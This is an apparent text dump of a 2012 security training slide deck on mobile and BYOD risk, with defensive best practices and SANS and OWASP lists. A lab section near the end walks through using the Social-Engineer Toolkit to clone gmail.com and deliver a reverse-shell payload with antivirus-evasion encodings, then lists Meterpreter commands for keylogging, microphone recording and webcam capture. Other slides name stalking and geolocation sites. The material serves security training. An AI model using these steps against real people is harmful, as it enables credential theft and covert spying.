NE State 2012 PPT - Ernest Staats Network Security Consulting
Download
Report
Transcript NE State 2012 PPT - Ernest Staats Network Security Consulting
http://es-es.net/
Portable Device Hacking Made Easy
MS Information Assurance, CISSP, CWNA, CEH, MCSE, Security+, I-Net+, Network+, Server+, CNA, A+
[email protected] http://es-es.net
Enterpersonal Impact
Blurring of professional/Work and private life
One device that serves both needs
How do you address the multitude of devices?
iPhone, Androids, Blackberry, Windows, etc.
Now multiple tablets
Netbook/Ultrabooks
Cloud Security implications
What are consumers expectations of network speed and
access
MiniPwner & Ipad
software
•
•
•
•
•
•
•
•
•
•
•
•
•
•
•
•
Listed in Lab manual starting on Page 11
MiniPwner Here is a list of some of the software that comes installed:
Nmap network scanner
Tcpdump sniffer
Netcat Hacker’s swiss army knife
aircrack Wireless network analysis
kismet Wireless network analysis
perl Perl Scripting Language
openvpn VPN Client and Server
dsniff suite of sniffing and spoofing tools, including arpspoof
nbtscan NetBIOS Network Scanner
snort Sniffer, Packet Logger, Intrusion Detection System
samba2-client Windows File Sharing Client
elinks Text Based Web Browser
yafc FTP Client
openssh-sftp-client Secure File Transfer Client
Pwn Plug
•
•
•
•
•
•
Fully loaded. Wireless, 3G/GSM, & NAC/802.1x bypass!
Includes 3G, Wireless, & USB-Ethernet adapters
Fully-automated NAC/802.1x/RADIUS bypass!
Out-of-band SSH access over 3G/GSM cell networks!
One-click Evil AP, stealth mode, & passive recon
Maintains persistent, covert, encrypted SSH access to your target
network
• Tunnels through application-aware firewalls & IPS
• Supports HTTP proxies, SSH-VPN, & OpenVPN
The Compromise
•
Important things to keep in mind:
– Total security = fiction
– Most exploits are internal
– Most exploits do not involve decrypting data
– Humans are the weakest link:
•
Sate of Utah 25 Min Default PWD
Hacking is so easy a chimp can do it
Software demonstrated -- Use entirely at your
own risk and get Permission first
Ernest or Eric are not responsible for any
subsequent loss or damage whatsoever!
This knowledge is intended to be used responsibly so we can provide
environments that are secure, safe and accessible
Mobile Devices
Top 10 Mobile Risks
8
Top 10 Mobile Controls
OWASP 10 Mobile Controls & Design Principles
Identify and protect sensitive data on Perform data integration with third
the mobile device
party services/applications securely
9
Handle password credentials
securely on the device
Pay attention to the collection and
storage and use of the user’s data
Ensure sensitive data is protected in
transit
Implement controls to prevent
unauthorized access to paid-for
resources
. Implement user authentication
/authorization and session
management correctly
Ensure secure distribution
/provisioning of mobile applications
Keep the backend APIs (services)
and the platform (server) secure
Carefully check any runtime
interpretation of code for errors
Understand RISK!
Analyze risk
risk = (cost of an exploit)*(likelihood it will occur)
Mobile devices make this inexpensive and very possible (BeetleJuice)
inside of “Flame”
Demos:
Bypass DLP
(Safepod)
ANTI
FaceNif
WIFI Kill
Security Challenges
• Inherent trust. “It’s MY PHONE.”
• Portability is a benefit and a risk
• Controls if lost
• Lock/Erase? Implications of erasing personal data
• PIN security – secure or easy to do 1 handed
• What is resident in memory?
• Malware – whole new breed of malware and products
• Malicious apps
• Increasing
• How do you write secure apps?
• Social engineering providers – value of OOB
communication
• Where did my app come from ? What is a trusted
source?
What Your Mobile Phone Knows
Text messages, even deleted ones
Words in your personal dictionary
Facebook contacts
Tens of thousands of location pings
Every website ever visited
What locations you have mapped
Emails going back a month
Your photos with geolocation data attached – even if deleted
How many times you have checked your email
Any application ever installed on your device
http://www.theatlantic.com/technology/archive/2011/04/what-does-your-phone-know-aboutyou-more-than-you-think/237786/
Cell / Mobile Issues
Rogue Apps
Live malware found
How will you updated
Over the air or tethered
What about Bring your own Device
Geo tracking
Metadata collection
Jailbreakme.com
Publish standards of what you will or will not support
Poorly codded apps that limit password length complexity, and
allow paste
Running Wireshark from a mobile device
Embed Evil Java Apps
A pop-up asks if they want to open the Java application
They will, users tend to be very curious
The payload can be
Shell
Rootkit
VNC
Automatically run enumeration scripts when the victim runs the
application
Check PDF’s : http://blog.zeltser.com/post/5567384219/onlinetools-for-malicious-pdf-analysis
Walled out network
Mobile Device
Management (MDM)
Secures mobile devices beyond Just Email (i.e. ActiveSync)
Application Delivery system
Provision and Configure new devices
Asset tracking/Finding or deleting
A good list of MDM solutions and what they offer
http://www.enterpriseios.com/wiki/Comparison_MDM_Providers
How to do BYOD (IMO)
Bottom line
Educate users
• Don’t divulge personal information
• Only friend “real” friends
• Stay away from the games and surveys
• If it is too good to be true, it probably is
• Use common sense…..!
• iOS/Android security is immature
• Device security measures can be evaded.
Wall off apps that are unacceptable to your organization
Use software to help secure devices
High-level Recommendations
(cont.)
• Enforce strong security on mobile
devices to the extent supported by the
platform
• Reduce the amount of data stored on
mobile devices
• Implement clear and strong terms of
acceptable use and legal protections
Smartphones Threats
Risk
Rating
Description
Data storage
High
Both iOS and Android devices can
store large amounts of data. Transfer
is possible via USB
tether(iOS/Android), Bluetooth and
removable Micro SD card(Android).
Circumventing network
controls
Medium
Increasingly, network data providers
offer options to use devices as an
Internet gateway for other computers.
Either by tethering a single computer
or making the device a Wi-Fi access
point, a user can access the Internet
outside of corporate network
connections of control
Recording device
Medium
High-quality audio and video
recording in a small form factor
presents a risk to confidential sites,
discussions, drawings, etc.
Advanced attacks
Low
Using device as a means of
advanced attack via Wi-Fi spoofing,
network snooping or other advanced
attacks is possible but would require
advanced user technical knowledge.
Device Security Audit …
Can Find:
• Security misconfigurations
• Lack of control implementation by device OS
• Data leakage into backups(local and cloud)
• Ability to modify controls on-device
• Breakable encryption
Remote wipe
• Remote wipe can be an effective method for preventing data
being compromised
• Removable media (SD cards) are normally not erased by
remote wipe routines
• Remote wipe cannot be actualized unless the device has a
data connection over Wi-Fi, cellular or satellite signal
• Companies should implement an effective remote wipe policy
Fundamental Elements
Platform
Hardware
Operating System
Management/Messagi
ng
iOS
Apple designs the
hardware, focused on
consumers
Apple developed and
maintains iOS. Updates
are currently pushed out
via iTunes with a high
percentage of users
updating their devices
quickly . Updates are
likely to move to overthe-air (OTA) very soon.
Apple has increased
device management
APIs, however it remains
limited compared to BES.
Third-party vendors
leverage the APIs to offer
MDM systems covering
iOS. Some features such
as Jailbreak detection
are not reliable.
Android
A large and growing list
of manufacturers develop
Android devices
Google is the primary
maintainer of Android but
accepts input from key
partners and even the
public. Updates are
pushed out by the
wireless carriers resulting
in a highly fragmented
and often out of date
ecosystem.
Android is beginning to
supply some device
management APIs
however it is limited
compared to BES. As
recently as version 2.1
key policies such as
passcode enforcement
and remote wipe were
not enforceable.
Leading providers
• Leaders in the MDM solutions field include:
»
»
»
»
»
AirWatch
MobileIron
Good Technology
Sybase Afaria
Zenprise
• Research has shown that many MDM security controls can be
evaded, and proper configuration of devices is important, so
post-implemetation testing is a must.
Where to start -Mobile/BYOD
•Device consistency--It is usually
•Have Stated Mobile Device Policy
•Make sure that users know mobile device policies
•Take security seriously— (Anti)
•Decide whether to allow personal devices
•Plan to deal with lost devices—and breakage issues
•Measure the impact of mobile devices on your network—
(bandwidth and network resources)
•Make sure that the IT staff is trained for mobile device support
Examples of file types that
contain metadata
JPG
EXIF (Exchangeable image file format)
IPTC (International Press Telecommunications Council)
PDF
DOC
DOCX
EXE
XLS
XLSX
PNG
MAC addresses, user names, edits, GPS info. It all depends on the file format.
Too many to name them all.
What Information is in
MetaData?
User Names:
Creators.
Modifiers .
Users in paths.
Operating systems
Printers.
Local and remote
Paths
Local and remote.
Network info.
Shared Printers.
Shared Folders.
ACLS.
Internal Servers.
NetBIOS Name.
Domain Name.
IP Address.
Database structures.
Table names.
Colum names.
Device hardware info
Photo cameras.
Private Info.
Personal data.
History of use.
Software versions.
Metadata Tools
FOCA
http://www.informatica64.com/DownloadFOCA/
Metagoofil
http://www.edge-security.com/metagoofil.php
Will extract a list of disclosed PATHs in the metadata, with this
information you can guess OS, network names, Shared resources,
etc also extracts MAC address from Microsoft Office documents
EXIF Tool
http://www.sno.phy.queensu.ca/~phil/exiftool/
EXIF Viewer Plugin
https://addons.mozilla.org/en-US/firefox/addon/3905
Jeffrey's Exif Viewer
http://regex.info/exif.cgi
Meta Data Images Lab
•Go to Metadata Tools
Then go to Jeffrey's Exif Viewer
http://regex.info/exif.cgi
•Photo 1
photo.JPG
•Where was the photo taken what was used to take the photo
Photo 2
_MG_5982_ES.jpg
What is the gender of the person you can not see?
User your own photoAdam Savage, of “MythBusters,” Read the full story
here: http://nyti.ms/917hRh
Turn off GPS function on
phones
Issues in BYOD and
Mobile environments
•
•
•
•
•
•
•
•
•
•
•
Does your AUP include Mobile devices
Wireless Capacity vs. Coverage
Where to start when securing mobile devices
Who is responsible for device security the student, parent, or
school?
What security do mobile devices need?
What are the policy issues to be considered?
How can safe and protected internet access be ensured?
How network loads can be predicted and what can be done to
control the network demand / load?
What security tools are available for smart phones, tablet devices
and so on?
What can be or should be installed on student owned devices?
What are other risks to be considered?
Acceptable Use Policy
• When using a mobile devices to access the Internet users
are required to connect using the Public network
• Set standards of security: Pin or Password to access device
• Mobile devices can only be used for specified purposes
• Any activity conducted on mobile devices cannot be
published without permission of ….. who are involved in the
text/image/video/audio file
• Staff will use appropriate mobile device etiquette by
respecting the privacy of other's device numbers and using
appropriate language with their mobile communication.
https://schoolweb.dysart.org/EdTech/Content.aspx?conID=479
WIFI Coverage vs. Capacity
Coverage does not grantee access especially with mobile devices
Drop your Radios strength & add more AP’s
Directional vs. Omni antennas
Client Type
Data
Voice
# of Clients per /AP
Examples
20-30
Laptops, tablet PC’s, Mobile
10-15
Wireless VoIP Phones, Badges
Hacking for the Masses
Anti app-- Finds open networks and shows all potential target devices.
The app offers up a simple menu with commands like "Man-In-The-Middle"
to eavesdrop on local devices, or even "Attack";
http://www.zimperium.com/anti.html
Put mobile devices on a separate VLAN with strict policy's in
place (ACL’s)
10 Min Break
Mobile Best Practices
Best Practices
•Enforce strong passwords
•Perform a remote wipe
•Perform an audit of security configurations and policies
•Encrypt local storage
•Enforce the use of virtual private network (VPN)
•Enforce wireless security policies for all mobile devices
• Backup and recovery of confidential data stored on
mobile devices
• Centralized configuration and software upgrades
WIFI Best Practices
•Use a WIDS solution to monitor for rogues in both
the 2.4 GHz and 5 GHz
•Periodically monitor for rogue APs using a handheld
monitor
•Use auditing techniques on the wired network to
discover intruders on the wireless
•Train employees not to connect to any ad hoc
WLANs
WIFI BP II
•Use 802.1X with EAP to provide mutual
authentication of users and servers
•Use one of the following EAP types: TLS, TTLS,
PEAP or FAST. Note that EAP-TLS requires
certificates on both sides
•If 802.1X is not deployed for the wired network, use
IPsec or SSL (if supported)
•Authenticate guests through a captive portal
webpage and monitor
Network BP
•Modify the default SSID
•Use a central WLAN system instead of
autonomous APs.
•Use strong passwords & Change passwords
periodically
•Disable wireless-side management
•Monitor vendor software updates and promptly
apply patches
•Use (SNMP) v3, Secure Shell (SSH), and SSL
•Restrict wired-side AP/controller access to
certain IP addresses, subnets and/or VLANs.
Tablet BP
•· Device lock: enable native device authentication (PIN,
password, pattern)
•· Anti-theft measures: Many tablets support remote lock or data
wipe … use of tablet "find me" services can also raise privacy
concerns.
•· Over-the-air encryption: All tablets can secure Web and email
with SSL/TLS, Wi-Fi with WPA2, and corporate data with mobile
VPN clients.
•· Stored data protection: Hardware and mobile OS support for
stored data encryption varies.
Tablet BPII
•Mobile application controls: Many downloaded apps require
access to sensitive data and features, understand what apps have
control to what data (Block iTunes on VPN)
•· Anti-malware: Tablets are not shipped with on-board anti-virus,
anti-spam, intrusion detection, or firewall apps.
•· Device management: For visibility, policy configuration, app
provisioning, schools can centrally manage tablets, no matter who
owns them.
BP for Owned Devices
•Enforce strong passwords for mobile device & network access
•Automatically lock out access after a 4+ of incorrect passwords
•Perform remote wipe when lost, stolen, sold, or sent for repair
•Perform a periodic audit
• Ensure that settings have not been modified
•Encrypt local storage, including all memory cards
•Enforce the use (VPN)
•Enforce the same wireless security policies for all devices
•Perform regular backup and recovery of confidential data
•Perform centralized configuration and software upgrades "over
the air"
Mobile security
management
•User authentication
•Password policy enforcement:
•Remote device wipe:
•White/black lists:
•Secure communication:
Mobile software
distribution
•Software packages:
•Package distribution:
•Mobile optimizations:
•Change control:.
Decisions
• Issued device (simplicity, consistency & cost) vs. What Do
Users Want
• Multiple device protection costs more
• What is needed for work?
• Impact of Innovation and Agility on what “need”
• Look at what OS’s need to support (OSX, Android, RIM,
Windows Mobile, Symbian, WebOS)
• Asset Management issues
• Tracking
• Assuring consistency of controls
• Policy – issue X. If you want to use something else then these
rules apply…
Other Considerations
• Enrollment Experience
• User self-enrollment – ease of use is critical.
•
•
•
•
•
•
Password/PIN policy decisions
Push capabilities turned on
Location services always on – battery impact
Jailbreak enforcement
Application blacklisting?
Encryption requirements
Lab Time
Labs
•
•
•
•
1 Email Privacy Tester https://emailprivacytester.com/
2 Pwned https://pwnedlist.com/
3 Bluestacks Click on ANTI
4 LANSearch Pro
•
5 SoftPerfect Network Scanner
6 Wireless Key
•
• 5. Other Nir Soft Utilities
Security Top Lists
How do you know if you
were hacked?
OWASP Top 10
A1: Injection
A2: Cross-Site Scripting (XSS)
A3: Broken Authentication and Session Management
A4: Insecure Direct Object References
A5: Cross-Site Request Forgery (CSRF)
A6: Security Misconfiguration
A7: Insecure Cryptographic Storage
A8: Failure to Restrict URL Access
A9: Insufficient Transport Layer Protection
A10: Unvalidated Redirects and Forwards
Source: https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project
SANS
Top Cyber Security Risks
Priority One:
Client-side software that remains unpatched. 1outof6 home
Priority Two:
Internet-facing web sites that are vulnerable.
Operating systems continue to have fewer remotely-exploitable
vulnerabilities that lead to massive Internet worms.
Rising numbers of zero-day vulnerabilities
Source: http://www.sans.org/top-cyber-security-risks/
SANS Top 20
1: Inventory of Authorized and Unauthorized Devices
2: Inventory of Authorized and Unauthorized Software
3: Secure Configurations for Hardware and Software on Laptops,
Workstations, and Servers
4: Secure Configurations for Network Devices such as Firewalls,
Routers, and Switches
5: Boundary Defense
6: Maintenance, Monitoring, and Analysis of Audit Logs
7: Application Software Security
8: Controlled Use of Administrative Privileges
9: Controlled Access Based on the Need to Know
10: Continuous Vulnerability Assessment and Remediation
Source: http://www.sans.org/critical-security-controls/
SANS Top 20 Continued
11: Account Monitoring and Control
12: Malware Defenses
13: Limitation and Control of Network Ports, Protocols, and Services
14: Wireless Device Control
15: Data Loss Prevention
16: Secure Network Engineering
17: Penetration Tests and Red Team Exercises
18: Incident Response Capability
19: Data Recovery Capability
20: Security Skills Assessment and Appropriate Training to Fill Gaps
Source: http://www.sans.org/critical-security-controls/
SANS Top 25 Software Errors
Insecure Interaction Between Components
CWE ID
Name
CWE-89
Improper Neutralization of Special Elements used in an SQL
Command ('SQL Injection')
CWE-78
Improper Neutralization of Special Elements used in an OS
Command ('OS Command Injection')
CWE-79
Improper Neutralization of Input During Web Page Generation
('Cross-site Scripting')
CWE-434 Unrestricted Upload of File with Dangerous Type
CWE-352 Cross-Site Request Forgery (CSRF)
CWE-601 URL Redirection to Untrusted Site ('Open Redirect')
Source: http://www.sans.org/top25-software-errors/
SANS Top 25 Software Errors
Risky Resource Management
CWE ID
Name
CWE-120 Buffer Copy without Checking Size of Input ('Classic Buffer
Overflow')
CWE-22
Improper Limitation of a Pathname to a Restricted Directory
('Path Traversal')
CWE-494 Download of Code Without Integrity Check
CWE-829 Inclusion of Functionality from Untrusted Control Sphere
CWE-676 Use of Potentially Dangerous Function
CWE-131 Incorrect Calculation of Buffer Size
CWE-134 Uncontrolled Format String
CWE-190 Integer Overflow or Wraparound
Source: http://www.sans.org/top25-software-errors/
SANS Top 25 Software Errors
Porous Defenses
CWE ID
CWE-306
CWE-862
CWE-798
CWE-311
CWE-807
CWE-250
CWE-863
CWE-732
CWE-327
CWE-307
CWE-759
Name
Missing Authentication for Critical Function
Missing Authorization
Use of Hard-coded Credentials
Missing Encryption of Sensitive Data
Reliance on Untrusted Inputs in a Security Decision
Execution with Unnecessary Privileges
Incorrect Authorization
Incorrect Permission Assignment for Critical Resource
Use of a Broken or Risky Cryptographic Algorithm
Improper Restriction of Excessive Authentication Attempts
Use of a One-Way Hash without a Salt
Source: http://www.sans.org/top25-software-errors/
Mitigation Strategies (Part 1)
Ranking
1
2
3
4
5
6
7
8
9
10
11
12
Strategy
Patch applications within 2 days for high risk vulnerabilities.
Patch O/S within 2 days for high risk vulnerabilities.
Minimize the number of local admins. Assign separate accounts.
Application white-listing: Prevent unauthorized programs.
HIDS/HIPS: Identify anomalous behavior.
E-mail content filtering: Allow only authorized attachments.
Block spoofed e-mail.
User education.
Web content filtering.
Web domain white-listing.
Web domain white-listing for HTTP/SSL.
Workstation inspection of Microsoft Office files.
Source: http://www.dsd.gov.au/infosec/top-mitigations/top35mitigationstrategies-list.htm
Mitigation Strategies (Part 2)
Ranking
13
14
15
16
17
18
19
20
21
22
23
24
Strategy
Application-based workstation firewall: block incoming traffic.
Application-based workstation firewall: prevent outgoing traffic.
Network segregation.
Multi-factor authentication.
Randomized local admin passphrases. (Prefer domain groups)
Enforce strong passphrases.
Border gateway using an IPv6-capable firewall.
Data Execution Prevention.
Antivirus software with up to date signatures.
Non-persistent virtualized trusted operating environment.
Centralized and time-synchronized logging: network traffic.
Centralized and time-synchronized logging: computer events.
Source: http://www.dsd.gov.au/infosec/top-mitigations/top35mitigationstrategies-list.htm
Mitigation Strategies (Part 3)
Ranking
25
26
27
28
29
30
31
32
33
34
35
Strategy
Standard O/S with unneeded functions disabled.
Application hardening: disable unneeded features.
Restrict access to NetBOIS features.
Server hardening.
Removable and portable media control.
TLS encryption between email servers.
Disable LanMan password support and cached credentials.
Block attempts to access web sites by their IP address instead of
by their domain name.
NIDS/NIPS: Identify anomalous traffic.
Gateway blacklisting to block access to known malicious
domains.
Full network traffic capture to perform post-incident analysis.
Source: http://www.dsd.gov.au/infosec/top-mitigations/top35mitigationstrategies-list.htm
Perceived Danger
Death by Shark at the Beach
The Real Danger
Death by Vending Machine at the Beach
APT-Focused Strategy
Risk-Based Approach
•
Initially implement subset of 20 Critical Controls to address Enterprises’
highest risks first (APT-related risks)
•
“Offense informs defense” concept suggests that 4 controls are best geared
to address APT-related risks
•
•
Controlled Access based on the Need-to-Know (Control 15)
Continuous Vulnerability Assessment and Remediation
•
•
Malware Defenses (Control 5)
Data Loss Prevention (DLP) (Control 17)
(Control 4)
Automation: Controls 15 & 17
(Focus on the Data)
Sensitive
Regulatory Data
Sensitive
Corporate Data
Credit card data
Privacy data (PII)
Health care information
Intellectual property
Control Data-at-Rest
Financial information
Trade secrets
Control Data-in-Motion
Control Data-in-Use
Automation: Controls 15 & 17
(Automating Data Classification and Policy Definition)
+
Business
Managers
Step 2
Create DLP Policy &
check for feasibility
DLP
Admin
End
Users
Step 1
Identify files &
set business rules
Step 3
DLP Policy is
routed for approval
Step 4
Approve
d
DLP
policy
Policy applied across the organization
Automation Approach: Controls 15 &
17
(Automating the Control of Data-in-Motion)
Process to Reach Automation (Data-in-Motion)
?
RISK
DISCOVER
(Data-in-Motion)
EDUCATE
(Data-in-Motion)
ENFORCE
(Data-in-Motion)
Risk Across: web protocols,
e-mails, IM, generic TCP/IP
protocols
Users Just-in-Time
Encryption, Blocking,
etc.
(Monitor Only)
Understand Risk
TIME
(Monitor & Educate)
Reduce Risk
(Automate Action)
Automation Approach: Controls 15 &
17
(Automating the Control of Data-at-Rest)
SharePoi
nt
Business
Users
Apply DRM
Database
s
NAS/SAN
Encrypt
Data Loss
Prevention
(DLP
File
Servers
Risk Remediation
Manager (RRM)
Delete / Shred
Change
Permissions
File Activity
Tools
GRC
Systems
Policy Exception
Endpoints
Discover Sensitive
Data
Manage Remediation
Workflow
Apply
Controls
Automation Approach: Controls 4 & 5
(Prevention and Mitigation of APTs/Understanding the Attack Vector)
Automation Approach: Controls 4 & 5
(Automating Continuous Monitoring of Malware
and Malware Callbacks)
Reducing risk of data loss through malware infections
•Implement basic and necessary malware protection – HIPS, AV,
AntiSpam, etc.
•Train and educate users concerning social engineering tactics.
•Use of advanced technology – Virtual inspection of executable
malware in real-time to identify and block command and control
communications.
Recommended Action Plan
1)
2)
3)
4)
5)
6)
Conduct gap assessment to compare Enterprises’s current security stance to
detailed critical controls
Implement “quick win” critical controls to address gaps
Implement controls numbers 4 & 5 using previous automation approaches
Implement controls numbers 15 & 17 using previous automation approaches
Analyze and understand how remaining controls (beyond quck wins, and
controls 4, 5, 15, 17) can be deployed
Plan for deployment, over the longer term, of the “advanced controls”, giving
priority to controls 4, 5, 15, 17
Building Secure Networks
Introduction
• SANS 20 Critical Security Controls for Effective
Cyber Defense
• Security Control 19 “Secure Network Engineering”
• Technical approaches to advance this control
• Scope is for Web/Mobile App and 40GbE
Secure Network Engineering
• Document Gathering is First Step
• Understand Data Flows
• Log Events and Correlate
• Apply Least Privileged Principles
• Divide and Secure
• Establish Trust and Validate Data Integrity
• Test and Validate Routinely
Next Generation Networks
• 40GbE is still early in “hype” cycle for Enterprises
• Throughput speed ≠ Wire speed
• Uncertainty increases relative to speed
• No forensic team experience with 40 GbE
• Existing operations resource capacity
Functional Requirements
1. Documentation
9. Virtual and Blade Servers
2. Data Center Physical Controls
10. Vulnerability and Threat Mgt
3. Enclaves
11. Log Mgt
4. Firewalls and Security Apps
12. Asset Mgt
5. Internet Access
13. Access Mgt
6. DNS
14. Performance Mgt
7. Hardening
15. Forensic Mgt
8. Config and Change Mgt
16. Service Mgt
Key Risk Considerations
• Mixing assets of different value
• Integrating security and network controls
• High event volume and Impact of false negatives
• Understanding data flows and security policies
• Performance impact of inspection
• Protecting high authority access
• Configuration errors and product defects
High-level Design
and Build Approach
N-Tier Application
Control Checklist
Enclave for each app function
Dedicated Internet Access
Firewall
Security Fabric
Separate Infrastructure Firewall
SSL Accelerator and Proxies
Tiered DNS
Virtualization and Blade
Servers
Netflow
Network Address Translation
Network Monitoring Switch
Load Balancers
Lessons Learned
Pitfalls
•Poor Documentation
•Too many ACLs and Flows
•Netflow “meltdown”
•4 x10 Port Aggregation
•Virtual Switch Overload
•Poorly designed QoS
•Forensic Teams
Promising Solutions
•
Security Fabric
•
Firewall Policy Mgt
•
Virtual Switch Replacement
•
IEEE 802.1AE (MACsec)
Benefits
• Improved Security
• Increased Design Credibility
• Better Manageability
• Lower Total Costs
• Faster Response to Threats
Ultimately, adopting these design recommendations will provide a solid foundation
for safeguarding infrastructure and data at the highest speeds available today—and
tomorrow.
Social Media Issues
Facebook Content &
Spying
•Recently Facebook had both hardcore and gory images due to a hack…
•http://www.neowin.net/news/massive-hardcore-porn-outbreak-hits-facebook
•Facebook Visualizer -•Police can make profiles about a person such as where they would most likely
go if they were in trouble, where they might hide, what friends they would turn
to etc...
http://www.lococitato.com/facebookvisualizer/
•Generates animated, clickable maps of the relationships between Facebook
users.
•Features include profile summaries, export of networks to csv files, fast search
utility and storage of complete html code and download time
•They also have products for Myspace and YouTube.
Cyberstalking Sites
Lullar
Search using email or user name
http://com.lullar.com/
Spokeo
Searches lots of public Records to find information about
someone http://www.spokeo.com
KnowEm
Claims to check over 500 sites to see if a given user
name is taken
http://knowem.com
•Peek You old but still full of good info about someone
http://www.peekyou.com
http://www.googleguide.com/advanced_operators.html
Social Media Search
Engines
•Kurrently offers the ability to search both Facebook and Twitter in
real time
•Who’s Talkin It searches 60 social media gateways
•Socialmention Social Media Alerts : Like Google Alerts but for
social media
•Your Open Book Looks at profile status updates
Geolocation tools
• http://www.bing.com/maps
• http://twittermap.appspot.com
• http://www.fourwhere.com/
• http://icanstalku.com
• http://ip2geolocation.com
Cree.py
Great tool for geolocating/tracking Twitter/Foursquare
users.
http://ilektrojohn.github.com/creepy/
Network Domain Info online
RobTex
A great site for doing reverse DNS look-ups on IPs, grabbing
Whois contacts, and finding other general information about an IP
or domain name
http://www.robtex.com
ServerSniff
ICMP & TCP traceroutes, SSL Info, DNS reports and Hostnames
on a shared IP. It’s nice to have them do some of the recon for you
http://serversniff.net
Check if your email address has been owned
http://beta.serversniff.de/compromised.php
10 Min Break
Lab Time
Network Mapping
Portable apps
Angry IP Scanner let’s scan our local network what shares
are open
Wireless keyview find your key
WNetWatcher
inSSIDer 2.0
Netsparker - Community Edition
Attack_Surface_Analyzer_BETA_x64
WSCC -- Windows System Control Center
Google Hacking Diggity Project -- SearchDiggity.Client Google and
Bing “hacking”
FireFox portable
FreeScreenRecord–
HoffmanUtilitySpotlight2009_04 -- Rich Copy great copying
Commands
–
–
•
•
•
•
•
Enter option 2: Website Attack Vectors
Enter option 1: The Java Attack Method
Enter option 2: Site Cloner
Enter url https://gmail.com
It asks you "What payload do you want to generate:" and lists 11 choices
–
•
•
Enter no
It now shows blue text saying:
–
–
•
Press Enter for default
It asks you whether you want to create a Linux.OSX reverse_tcp payload.
–
•
Press Enter for default
It asks you to "Enter the PORT of the listener (enter for default):
–
•
Press Enter for default
It shows a list of 16 encodings to try and bypass AV.
–
•
cd /pentest/exploits/SET
./set
[*] Launching MSF Listener...
[*] This may take a few to load MSF...
Wait... When it's done, you will see a whole screen scroll by as Metasploit
launches, ending with this message:
msf auxiliary(smb) >
On the Target
• Open a Web browser and go to the Metasploit IP
address
– Works on IE, Firefox,
and Chrome
– User will see this
warning box
– Studies show that
users almost always
just click past
those warning boxes
GAME OVER
• The target is now owned. We can
–
–
–
–
–
–
Capture screenshots
Capture keystrokes
Turn on the microphone and listen
Turn on the webcam and take photo
Steal password hashes
Etc.
Fun & Games
• To remotely control the target:
– sessions -i 1
• Commands to try:
–
–
–
–
–
–
screenshot
keyscan_start
keyscan_stop
record_mic 10
webcam_list
webcam_snap 1
• McAfee found that one in every six personal computers have
zero protection: 17% of those scanned either had disabled or
nonexistent anti-virus software. The country with the lowest rating
was Singapore, with 21.75% of consumers unprotected. Perhaps
the most surprising: the United States ranked in the bottom 5
least protected, with 19.32% of consumers living without basic
security. The country with the highest percentage of basic security
protection was Finland, with only 9.7% of consumer PCs
unprotected. Consumers globally say 27% of their digital files
would be “impossible to restore” at all if lost, and not backed
up properly, and had an average value of $10,014 US
Resources
Resources
Vulnerabilities:
–OWASP (http://www.owasp.org)
–SANS Top 20 (www.sans.org/top20)
–National Vulnerability Database (http://nvd.nist.gov)
–cgisecurity (http//www.cgisecurity.com)
Guidance:
–National Institute of Standards and Technology (NIST)
Computer Security Resource Center
(http://csrc.nist.gov/publications/nistpubs/)
–Center for Internet Security (CIS)
(http://www.cisecurity.org/)
–Educause
(http://connect.educause.edu/term_view/Cybersecurity)